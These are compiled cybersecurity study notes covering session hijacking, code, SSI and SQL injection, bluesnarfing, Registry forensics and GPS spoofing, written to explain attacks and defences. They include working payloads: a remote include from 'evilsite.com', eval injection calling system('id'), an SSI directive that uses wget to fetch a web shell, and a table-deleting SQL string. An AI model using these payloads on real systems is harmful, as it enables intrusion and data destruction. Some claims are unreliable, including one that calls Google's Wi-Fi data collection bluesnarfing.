If source-routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from elsewhere on the net.
An attacker can also be "inline" between A and C using a sniffing program to watch the conversation. This is known as a "man-in-the-middle attack".

SESSION HIJACKING EXPLOITS
Firesheep
In October 2010, a Mozilla Firefox extension called Firesheep was released that made it easy for session hijackers to attack users of unencrypted public Wi-Fi. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the Firesheep user to easily access private information from cookies and threaten the public Wi-Fi user's personal property. Only months later, Facebook and Twitter responded by offering (and later requiring) HTTP Secure throughout.

WhatsApp sniffer
An app named "WhatsApp Sniffer" was made available on Google Play in May 2012, able to display messages from other WhatsApp users connected to the same network as the app user. At that time WhatsApp used an XMPP infrastructure with encryption, not plain-text communication.
 
DroidSheep
DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session id from these packets in order to reuse them.  DroidSheep can capture sessions using the libpcap library and supports: open (unencrypted) networks, WEP encrypted networks, and WPA/WPA2 encrypted networks (PSK only). This software uses libpcap and arpspoof. The apk was made available on Google Play but it has been taken down by Google.

CookieCadger
CookieCadger is a graphical Java app that automates sidejacking and replay of HTTP requests, to help identify information leakage from applications that use unencrypted GET requests. It is a cross-platform open-source utility based on the Wireshark suite which can monitor wired Ethernet, insecure Wi-Fi, or load a packet capture file for offline analysis. Cookie Cadger has been used to highlight the weaknesses of youth team sharing sites such as Shutterfly (used by AYSO soccer league) and TeamSnap.

Methods to prevent session hijacking include:
a.       Encryption of the data traffic passed between the parties by using SSL/TLS; in particular the session key (though ideally all traffic for the entire session). This technique is widely relied-upon by web-based banks and other e-commerce services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack. In response, scientists from the Radboud University Nijmegen proposed in 2013 a way to prevent session hijacking by correlating the application session with the SSL/TLS credentials.
b.      Use of a long random number or string as the session key. This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks.
c.       Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after they have logged in.
d.     
Some services make secondary checks against the identity of the user. For instance, a web server could check with each request made that the IP address of the user matched the one last used during that session. This does not prevent attacks by somebody who shares the same IP address, however, and could be frustrating for users whose IP address is liable to change during a browsing session.
e.      Alternatively, some services will change the value of the cookie with each and every request. This dramatically reduces the window in which an attacker can operate and makes it easy to identify whether an attack has taken place, but can cause other technical problems (for example, two legitimate, closely timed requests from the same client can lead to a token check error on the server).
Users may also wish to log out of websites whenever they are finished using them. However this will not protect against attacks such as Firesheep.
 

CODE INJECTION
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
a.       allowed characters (standard regular expressions classes or custom)
b.      data format
c.       amount of expected data

Code Injection differs from command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

Risk Factors
These types of vulnerabilities can range from very hard to find, to easy to find
If found, are usually moderately hard to exploit, depending of scenario
If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability

Examples
Example 1
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
The file “evilcode.php” may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute his PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 2
When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.
The example below shows a dangerous way to use the eval() function:
 
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
 
As there is no input validation, the code above is vulnerable to a Code Injection attack.
For example:
/index.php?arg=1; phpinfo()
While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:
/index.php?arg=1; system('id')

SERVER SIDE INCLUDES
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.
The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:
< ! # = / . " - > and [a-zA-Z0-9]
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.
 
The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user’s browser.

Risk Factors
TBD
Examples
Example 1
The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands.
Linux:
List files of directory:
<!--#exec cmd="ls" -->
Access directories:
<!--#exec cmd="cd /root/dir/">
Execution script:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
Windows:
List files of directory:
<!--#exec cmd="dir" -->
Access directories:
<!--#exec cmd="cd C:\admin\dir">
Example 2
Other SSI examples that can be used to access and set server information:
To change the error message output:
<!--#config errmsg="File not found, informs users and password"-->
 
To show current document filename:
<!--#echo var="DOCUMENT_NAME" -->
To show virtual path and filename:
<!--#echo var="DOCUMENT_URI" -->
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:
<!--#config timefmt="A %B %d %Y %r"-->
Using the “fsize” command, it is possible to print the size of selected file:
<!--#fsize file="ssi.shtml" -->
Example 3
An old vulnerability in the IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. CVE 2001-0506.
By creating a malicious page containing the SSI code bellow and forcing the application to load this page (Path Traversal attack), it’s possible to perform this attack:
ssi_over.shtml
<!--#include file=”UUUUUUUU...UU”-->
PS: The number of “U” needs to be longer than 2049.
Forcing application to load the ssi_over.shtml page:
Non-malicious URL:
www.vulnerablesite.org/index.asp?page=news.asp
Malicious URL:
www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml
If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.

SQL INJECTION
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Threat Modeling
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections.
The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.
SQL injection errors occur when:
a.       Data enters a program from an untrusted source.
b.      The data used to dynamically construct a SQL query is puffed
The main consequences are:

Confidentiality
: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.
Authorization: If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL Injection vulnerability.
Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL Injection attack.
SQL Injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind.
 
Essentially, the attack is accomplished by placing a meta character into data input to then place SQL commands in the control plane, which did not exist there before. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.

Examples
Example 1
In SQL:
select id, firstname, lastname from authors
If one provided:
Firstname: evil'ex
Lastname: Newman
The query string becomes:
select id, firstname, lastname from authors where forename = 'evil'ex' and surname ='newman'
which the database attempts to run as:
Incorrect syntax near il' as the database tried to execute evil.
 
A safe version of the above SQL statement could be coded in Java as:
String firstname = req.getParameter("firstname");
String lastname = req.getParameter("lastname");
// FIXME: do your own validation to detect attacks
 
String query = "SELECT id, firstname, lastname FROM authors WHERE forename = ? and surname = ?";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, firstname );
pstmt.setString( 2, lastname );
try
{
    ResultSet results = pstmt.execute( );
}
Example 2
The following C# code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.
    ...
    string userName = ctx.getAuthenticatedUserName();
    string query = "SELECT * FROM items WHERE owner = "'"
                    + userName + "' AND itemname = '"
                    + ItemName.Text + "'";
    sda = new SqlDataAdapter(query, conn);
    DataTable dt = new DataTable();
    sda.Fill(dt);
    ...
The query that this code intends to execute follows:
    SELECT * FROM items
    WHERE owner =
    AND itemname = ;
 
However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string “name’ OR ‘a’=’a” for itemName, then the query becomes the following:
    SELECT * FROM items
    WHERE owner = 'wiley'
    AND itemname = 'name' OR 'a'='a';
The addition of the OR ‘a’=’a’ condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:
    SELECT * FROM items;
This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.
Example 3
This example examines the effects of a different malicious value passed to the query constructed and executed in Example 1. If an attacker with the user name hacker enters the string “name’); DELETE FROM items; –” for itemName, then the query becomes the following two queries:
    SELECT * FROM items
    WHERE owner = 'hacker'
    AND itemname = 'name';
    DELETE FROM items;
    --'
Many database servers, including Microsoft® SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error in Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, in databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.
Notice the trailing pair of hyphens (–), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. In a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in Example 1. If an attacker enters the string “name’); DELETE FROM items; SELECT * FROM items WHERE ‘a’=’a”, the following three valid statements will be created:
    SELECT * FROM items
    WHERE owner = 'hacker'
    AND itemname = 'name';
    DELETE FROM items;
    SELECT * FROM items WHERE 'a'='a';
One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from a whitelist of safe values or identify and escape a blacklist of potentially malicious values. Whitelisting can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, blacklisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:
a.       Target fields that are not quoted
b.      Find ways to bypass the need for certain escaped meta-characters
c.       Use stored procedures to hide the injected meta-characters
Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.
Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they fail to protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.
    procedure get_item (
        itm_cv IN OUT ItmCurTyp,
        usr in varchar2,
        itm in varchar2)
    is
        open itm_cv for ' SELECT * FROM items WHERE ' ||
                'owner = '''|| usr ||
                ' AND itemname = ''' || itm || '''';
    end get_item;
Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.

BLUESNARFING
Bluesnarfing is the theft of information through Bluetooth. Hackers do it by sneaking into mobile devices — smartphones, laptops, tablets, or PDAs whose connection has been left open by their owners. It implies exploiting Bluetooth vulnerabilities in order to grab such data as text or email messages, contact lists, and more. It’s easy to become a victim of a bluesnarfing attack if you have the habit of using Bluetooth in public places and your phone is usually in a discoverable mode.
Cybercriminals can perform the bluesnarfing attack on a device even when it is 300 feet away. What they can steal by doing so is mindblowing and quite scary. They can practically copy the entire content of your phone or device, including your emails, contact list, phone number, passwords, and your pictures. Some bluesnarfing attackers use the victim’s phone to call long distance, leaving its owner with a huge telephone bill. All these happen without the victim’s knowledge, of course, and so attacks can go on for a long time.
Perhaps the most widely known bluesnarfing case was that performed by Google back in 2013. The tech giant admitted that it collected data from unencrypted wireless networks, which is bluesnarfing in its raw form. Among the information obtained were emails and passwords. As a result, Google paid a settlement amounting to US$7 million.

History of Bluesnarfing
Researcher Marcel Holtmann first discovered bluesnarfing. However, it became publicly known when Adam Laurie of A.L. Digital disclosed a vulnerability on a blog. He found the bug in November 2003 and wanted to let the manufacturers of Bluetooth devices know about it immediately.
At present, both black- and whitehat hackers can easily access bluesnarfing tools and services on the Dark Web. All they initially need is a downloadable penetration-testing utility such as bluediving. This tool identifies if a device is susceptible to bluesnarfing attacks. Once it finds that a device is vulnerable, the hacker can do any of the following:
  1. Perform a bluesnarfing attack on his own if he has enough programming skills.
  2. Hire a bluesnarfing attacker.
  3. Get code snippets from websites that teach bluesnarfing

How Can You Avoid Bluesnarfing Attacks?
Since the attack relies on Bluetooth connections, the most logical and safest way to counter it is by turning off your device’s Bluetooth when it’s not in use. Below are other best practices to avoid becoming a victim of bluesnarfing:
 
  1. Use a personal identification number (PIN) that has at least eight characters so it will be harder for attackers to crack.
  2. Take advantage of your phone’s security features, such as two-factor authentication (2FA). That way, your approval is needed for all connection requests.
  3. Do not accept pairing requests from unknown devices.
  4. Turn off your phone’s discovery mode to make it invisible to unknown devices.
Any form of theft is scary, and these days, digital theft is alarmingly rampant. Bluesnarfing is just one of the many methods by which attackers can steal your sensitive and confidential data.

WINDOWS REGISTRY
Windows Registry Forensics is a very important branch of computer and network forensics. The real cases are more complex and different forensic tools need to be used together to achieve enough evidence. The Windows Registry has Keys and subkeys that have forensic value. In a digital age, information has become an important resource that people depend on in every aspect of their lives. With the development of computers and networks, the communication of information becomes faster and faster. Fast internet access makes it possible to create social networks and share news and events across the world quickly. However, as people enjoy the convenience of information access and transfer, the risks of security and privacy problems increase greatly too. People with malicious motives use sophisticated technology as a tool to access information they are not authorized to access. With these malicious actions computer and network forensics emerged as a discipline. Computer and network forensics is the abbreviation of computer and network forensic science. It includes a number of fields such as hard drive forensics, remote forensics, mounted devices forensics, Registry forensics, and so
on.

 The Registry structures of Windows XP and Windows 7 are very similar and both of them have the same root keys. Microsoft has warned its customers to keep away from the Registry --Windows’s heart -- since it stores all of the computer settings and is very complex. Windows Registry contains all of the configuration settings of specific users, groups, hardware, software, and networks. However,hackers often explore and alter the keys and values in Windows Registry to attack a computer or leave a backdoor.

THE WINDOWS REGISTRY BASICS
Windows Registry is a central repository or hierarchical database of configuration data for the operating system and most of its programs. It contains abundant information that has potential evidential value in forensic analysis. Windows Registry Editor can be used to access Windows Registry. Windows Registry Editor can be started by using the “run” command to run the “regedit.exe” file.
  
 The History of Windows Registry
The root of Microsoft operating system was MS-DOS, which was a command line operating system. In the DOS age, there was no registry but two files designed to store the configuration information: “config.sys” and “autoexec.bat”. “Config.sys” was used to load the device drivers and “autoexec.bat” was used to store the configurations of running programs and other environmental variables. When the first graphical interface operating system of Microsoft, Windows 3.0, was released, these two files used in MS-DOS were replaced by INI files. These files were used to store the configuration settings of the computers.
In Windows 95, a hierarchical database named Registry was introduced. Although the Registry of Windows 95/98 has the similar structure as Windows XP/Vista/7, the amount of data in Windows XP/Vista/7 Registry has grown tremendously. The Registry in Windows XP/Vista/7 has a more stable and complex structure than Windows 98/95/2000. In addition, the structure of Windows XP registry could be considered as the basis of modern WindowsRegistry. Although Windows Vista/7 Registry has more content than Windows XP registry, it has very similar structures, keys, subkeys, and values as Windows XP registry.

The Structure of Windows Registry
The Windows Registry Editor is divided into two panels, the left one is key panel and the right one is value panel. In the left panel, there are five root keys: HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS, and HKEY_CURRENT_CONFIG.
These root keys form the basic structure of Window Registry. However, this structure is just a logical structure. Among these five root keys, only two root keys, HKEY_LOCAL_MACHINE and HKEY_USERS, have physical files or hives. These two keys are called master keys. The other three keys are derived keys since they are derived from the two master keys and their subkeys, or, they only offer symbolic links to the two master keys and their subkeys.
The five root keys and their subkeys are described below
  1. HKEY_LOCAL_MACHINE (abbr. HKLM). HKLM is the first master key. It contains all of the configuration settings of a computer. When a computer startups, the local machine settings will boot before the individual user settings. If we double-click this entry in Windows Registry Editor, five subkeys will be listed: HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM.
The information contained by these subkeys are listed below:
HARDWARE is used to store the information of hardware devices that a computer detects when the computer starts up. So, the subkeys in HARDWARE are also created during the booting process.
SAM is the abbreviation of Security Account Manager which is a local security database. Subkeys in SAM contain the setting data of users and work groups.
SECURITY includes a local security database in SAM and a strict ACL is used to manage the users who could access the database.
SOFTWARE includes all of the configuration settings of programs. Information on the programs is stored in a standard format: HKLM\Software\Vendor\Program\Version.
SYSTEM contains the configuration settings of hardware drivers and services. The key path is HKEY_LOCAL_MACHINE\SYSTEM\ControlSetXXX, where XXX is a three digital number from 000.
  1. HKEY_USERS (abbr. HKU). HKU is another master key. It contains all of the per-user settings such as current console user and other users who logged on this computer before. Double-click this entry, we can see at least three kinds of subkeys listed: KEFAUTL, SID, and SID_CLASS. SID is security identifier which refers to the current console. SID-CLASSES contains per user class registration and file association. Usually, we could see S-1-5-18, S-1-5-19, and S-1-5-20, which represents Local System Account, Local Service Account, and Network Service Account respectively.
  2. Unlike the above two keys, HKEY_CLASSES_ROOT (abbr. HKCR), HKEY_CURRENT_USER (abbr. HKCU), and HKEY_CURRENT_CONFIG (abbr. HKCC) are derived keys and they only link to the two master keys and their subkeys.
  3. HKEY_CLASSES_ROOT (abbr. HKCR). HKCR contains two keys: HKLM\SOFTWARE\Classes and HKCU\Software\Classes. The first one refers to the default registration classes, and the second one refers to per user registration classes and file associations.
  4. HKEY_CURRENT_USER (abbr. HKCU). HKCU links to a subkey of HKU, HKU\SID. This key allows all of the Windows programs and applications to create, access, modify, and store the information of current console user without determining which user is logging in.
  1. Under the root key HKCU, there are also five subkeys: Environment, Identities, Network, Software, and Volatile Environment.
Environment is about the environmental configurations.
Identities are related to Outlook Express.
Network contains settings to connect the mapped network drive.
Software refers to the user application settings.
Volatile Environment is used to define the environmental variables according to different users who logon a computer.
  1.  HKEY_CURRENT_CONFIG (abbr. HKCC). HKCC is an image of the hardware configuration profiles. HKLM\SYSTEM\Current\ControlSet\Hardware\Current, is also a link to HKLM\SYSTEM\ControlSet\Hardware Profiels\XXXX, where XXXX is a four digital number from 0000.
 Values
If we compare the Windows folders and files with Windows Registry, then the keys and subkeys could be considered as folders and sub folders, and the values of a key could be considered as the files in a folder. Just like a file of Windows, a value also has its properties.
Name, type, and data are the three components of a value. Every value has a unique name. The naming regulations are also similar to those of files. Some special characters such as “?”, “\”, and so on could not appear in the name of a value. There are six major types of values: string, multistring, expandable string, binary, Dword, and Qword.
• String values are the easiest to understand because data in this type is recorded in plain text in English.
• Multistring values include a list of strings with ASCII code 00 separating these strings .
• Expandable string is another variant of string value. Expandable string contains special variables such as %SYSTEMROOT%, %USERPROFILE% and so on. These variables could replace some special path easily.
For example, if we want to locate the folder
X:\Documents and Settings\username\Desktop, the %USERPROFILE%\Desktop could be used no matter on which drive windows are installed and which user logs on.
• Binary value also stores string but the data is displayed in hex format and the information stored is always related to hardware.
• Unlike the above value types, the data stored in Dword and Qword are not strings of characters. There are two numbers in Dword and Qword types: 1 and 0 (usually 1 for enable and 0 for disable). In some cases, numbers within 60 are used to indicate data related to timeout settings. However, the difference between Dword and Qword is that Dword stores 32-bit data and Qword stores 64-bit data.

Hives
Hives are the physical files of the two master keys in Windows Registry stored on hard drive.
The tree format we view through Windows Registry Editor, is a logical structure of the five root keys. If we use forensic tools to view the Windows Registry in an offline environment or view the Registry remotely, only the two master keys will be listed. So only the two master keys and their subkeys have hives. The hives of HKLM’s subkeys are stored at %SYSTEMROOT%System32\config, and the hives of HKU’s subkeys are stored at %USERPFOFILE%.
 

DRONES
United States military and intelligence agencies are increasingly relying on unmanned aerial vehicles but these military drones have long been an attractive target for hackers. And lately, it seems as though the hackers are gaining entrance more easily. How is this possible?
In 2011 a CIA drone was captured by Iranian hackers who managed to force the drone to land inside hostile territory so they could seize it and reverse-engineer its technology. A group of University of Texas at Austin students discovered how to hack and take control of Homeland Security drones used to patrol the U.S./Mexico border. The students tried to inform the USDHS, but were initially met with resistance until they arranged a demonstration. Both of these groups managed to scramble the drone’s GPS signals and feed it false location data to make it think it was somewhere it wasn’t.
With self-driving vehicles (which are really land-based drones) on the horizon and the FBI warning terrorists could use them to deliver car bombs in the future, these vulnerabilities have the potential for major disasters. Some cars are already vulnerable to hacking attacks. In 2010 researchers from the University of California and University of Washington demonstrated they could hack into a vehicle and disable the brakes.
Even if a hacked drone isn’t captured, tapping into its camera feed could give enemy forces tactical advantages. In 2009 Iraqi militants were able to intercept drone footage, giving them insight into information available to military intelligence. The problem is by their nature drones are remote-controlled and rely on wireless signals from outside. The programming languages used to write software for most military drones were not created specifically for the military. They have known vulnerabilities which makes the software easier for hackers and engineers to crack. There are even “how-to” manuals for drone hackers freely available online.
Most of the information originally came from NATO research and studies. One of these studies was published just a month before the Iranian drone hijacking and could have played a part in the attack. It’s also not difficult to get the hardware and software necessary. The students were able to build their hijacking device for under $1,000. The Iraqi hackers used Russian software that’s normally used to steal satellite TV and available for just $26.
The United States Department of Defense is trying to counter these vulnerabilities by developing a new “unhackable” programming language from scratch. The new language is named Ivory and WAS expected to go into production on the Boeing Little Bird H-6U helicopter drone by the end of 2017. A test flight for the new software using a Little Bird is scheduled for that summer.

GPS Is Easy To Hack, And The U.S. Has No Backup
On August 5, 2016, Cathay Pacific Flight 905 from Hong Kong was heading for an on-time arrival at Manila’s Ninoy Aquino International Airport when something unexpected occurred. The pilots radioed air traffic controllers and said they had lost GPS (Global Positioning System) guidance for the final eight nautical miles to “runway right-24.”
Surprised, the controllers told the pilots to land the wide-body Boeing 777-300 using just their own eyes. The crew members pulled it off, but they were anxious the whole way in. Fortunately, skies were mostly clear that day.
The incident was not isolated. In July and August of that year, the International Civil Aviation Organization received more than 50 reports of GPS interference at the Manila airport alone. In some cases, pilots had to immediately speed up the plane and loop around the airport to try landing again. That kind of scramble can cause a crew to lose control of an aircraft. In a safety advisory issued this past April, the organization wrote that aviation is now dependent on uninterrupted access to satellite positioning, navigation and timing services and that vulnerabilities and threats to these systems are increasing.
In incidents involving at least four major airports in recent years, approaching pilots have suddenly lost GPS guidance. In June a passenger aircraft landing in Idaho nearly crashed into a mountain, according to NASA’s Aviation Safety Reporting System. Only the intervention of an alert air traffic controller averted catastrophe. Security analysts and aerospace engineers who have studied the events say the likely cause in at least some instances is malicious interference. In the best-case scenario, GPS jamming will cause significant delays as pilots are forced to reroute a flight’s last miles, costing airlines and passengers, says Martin Lauth, a former air traffic controller, who now is an associate professor of air traffic management at Florida’s Embry-Riddle Aeronautical University. Crippled GPS could shut down an airport. If someone hacked GPS and instrument landing systems at the major airports in the greater New York City area, there would be no easy place to send arriving planes. Incoming transoceanic flights in particular would start to run out of fuel.
Although we think of GPS as a handy tool for finding our way to restaurants and meetups, the satellite constellation’s timing function is now a component of every one of the 16 infrastructure sectors deemed “critical” by the Department of Homeland Security (DHS). Cell-phone networks, financial markets, the electric grid, emergency services, and more all rely on the timing for basic operation. Yet GPS is vulnerable. Because of the great distance the radio waves must travel—more than 12,000 miles between satellites and receivers on Earth—the signals are weak and easily overridden, or “jammed,” as apparently happened in Manila. They are also easy to “spoof”: a slightly stronger signal from a software-defined radio—a broadcast that can be created by software on a laptop—can deliver a false message or replay an authentic message infused with false information, causing the receiver to believe it is somewhere, or somewhen, it is not.
In critical infrastructure, an error of a few microseconds can cause cascading failures that can throw off an entire network. Todd Humphreys, an associate professor of aerospace engineering at the University of Texas at Austin, as well as Dana Goward, a member of the U.S. National Space-Based Positioning, Navigation and Timing Advisory Board (a federal committee), and a former executive at a major defense contractor, each told Scientific American they now worry that a foreign adversary or terrorist group could coordinate multiple jamming and spoofing attacks against GPS receivers and severely degrade the functionality of the electric grid, cell-phone networks, stock markets, hospitals, airports, and more—all at once, without detection.
 
The real shocker is that U.S. rivals do not face this vulnerability. China, Russia and Iran have terrestrial backup systems that GPS users can switch to and that are much more difficult to override than the satellite-based GPS system. The U.S. has failed to achieve a 2004 presidential directive to build such a backup. No actual U.S. calamities have happened yet; if they had, policy makers would have finally acted. But as disaster experts like to note, the U.S. always seems to prepare for the previous disaster, not the upcoming one.

DEPENDENCE BECOMES A TARGET
The current GPS is a network of 31 satellites known as Navstar, operated by space squadrons of the U.S. Air Force. To maintain accuracy, the squadrons deliver Coordinated Universal Time to the satellites, via a network of four antennas from Cape Canaveral to Kwajalein Atoll, up to three times a day as the satellites fly overhead. Thanks to each satellite’s payload of atomic clocks, the time they keep is accurate to under 40 nanoseconds—after adjustments are made for general relativity, which makes the satellites’ clocks tick about 45 microseconds a day faster than clocks on Earth, and special relativity, which makes them tick seven microseconds slower.
Each satellite continually broadcasts a binary code on one of several frequencies. Military and civilian users get unique broadcasts, kept apart by special bits of code and by being 90 degrees out of phase with one another. The signals contain data packets that encode the time, the satellite’s position at the moment of transmission, and the orbit and status of the other satellites. The GPS receiver in a smartphone figures out its location by calculating how long it takes the radio signals to travel from the transmitting satellites, which provides their distances from the phone. A minimum of four signals is required for a receiver to accurately determine its position and time, which is why you might lose your handy navigation guide amid the skyscrapers of lower Manhattan or the narrow alleyways of Venice. Critical infrastructure in the U.S. has numerous receivers that synchronize operations.*
Hackers can jam a signal by drowning it out with meaningless noise, or they can spoof it by feeding the receiver false time or coordinates, which will disorient the receiver in time or space. Once one device has lost the correct time, it can send the spoofed time to other devices on its network, throwing off the entire complex and degrading its operation.
Industry is especially reliant on GPS because it is the most accurate timekeeping method on Earth and it is free. In the days before GPS, electric-grid operators could only estimate the load on their transmission lines, which led to inefficiencies; today GPS timing allows them to track the state of the grid and optimize operation in response to real-time demand. Financial markets once set their system time to a clock on the wall. Inaccurate timekeeping and uncoordinated transactions were widespread even after trading became computerized because early software used a clock inside a computer that was aligned by hand to the official time of the National Institute of Standards and Technology (NIST), the country’s timekeeper. Today’s financial systems, from a corner deli’s credit-card machine to stock markets, use GPS to time-stamp and verify transactions, freeing retailers from the need to transmit sales at the end of the day and enabling the worldwide, ultrahigh-frequency trading so prevalent now.
 
Cell-phone networks use GPS to break up, deliver and reassemble packets of data and to hand off calls from tower to tower as a phone moves. Electronic medical records are time-stamped with GPS time. Television networks use GPS to prove to advertisers that their commercials ran during the time slots they paid for. Worldwide, more than two billion GPS devices are used.
The great dependence on GPS is a tempting target. GPS is vulnerable and provides an opportunity for mayhem, and the capability to disrupt it has been shown. The only uncertain factor is whether an angry individual or group would choose GPS as a vehicle for an attack. The answer increasingly seems to be yes. “We now have ongoing demonstrations of state-sponsored spoofing,” Humphreys says.
One of those states is Russia. In March the Center for Advanced Defense Studies, a Washington, D.C., research nonprofit, identified nearly 10,000 incidents originating at 10 locations that included the Russian Federation, Crimea and Syria. Experts in the U.S. government and in academia say Iran and North Korea also have the capability. “Lots of countries and organizations” have it, Goward says.
A government adviser who has repeatedly warned Congress, a former executive at a defense contractor, and a former federal official who was speaking on background told Scientific American that a coordinated spoofing-jamming attack against various systems in the U.S. would be easy, cheap and disastrous. “It can be exercised on a massive and selective scale,” Goward says. A spoofing device costs about $5,000, and instructions are available online. Yet it is difficult to defend against: “Even a relatively trivial spoofing mitigation function against the most basic threats is far from simple to implement,” wrote Gerhard Berz, who works on navigation infrastructure for Eurocontrol, Europe’s air traffic control agency, in Inside GNSS, a trade magazine.
A large-scale, coordinated attack on U.S. infrastructure could be pulled off by 10 or 12 human operators with the right equipment, fanned out across the country. History was changed on September 11, 2001, by 19 Al Qaeda agents in the U.S., but hostile GPS disrupters would not need to have a suicidal devotion to God, the level of technical training required to fly a plane or the brutality to murder a cockpit crew. It is possible that the only thing stopping a GPS attack is international law, which recognizes electronic warfare as equivalent to violent acts if it brings about similar effects. Broad disablement of civil infrastructure would be likely to engender a U.S. military response, which at least so far may have dissuaded adversaries.

Although loss of life from a coordinated jamming-spoofing attack on GPS timing would probably be less than that on 9/11, the disabling effects could be more widespread. One scenario could involve changing stoplights at a few major intersections in various cities across the country to show green in all directions. A hacker in a nearby building would open a software-defined radio on a laptop. It would generate a false copy of the radio-frequency carrier, noise code and data bits from the provider of the global navigation satellite systems the traffic light was using. To induce the light to lock onto the bogus signal, the spoofer would disrupt the light’s regular tracking procedure, causing it to try to reacquire a signal. If the false signal were stronger, the light would likely select it. Now having access to the light’s controller, the hacker could feed it the incorrect time, activating the north-south signal’s green light before the east-west signal changed to red.
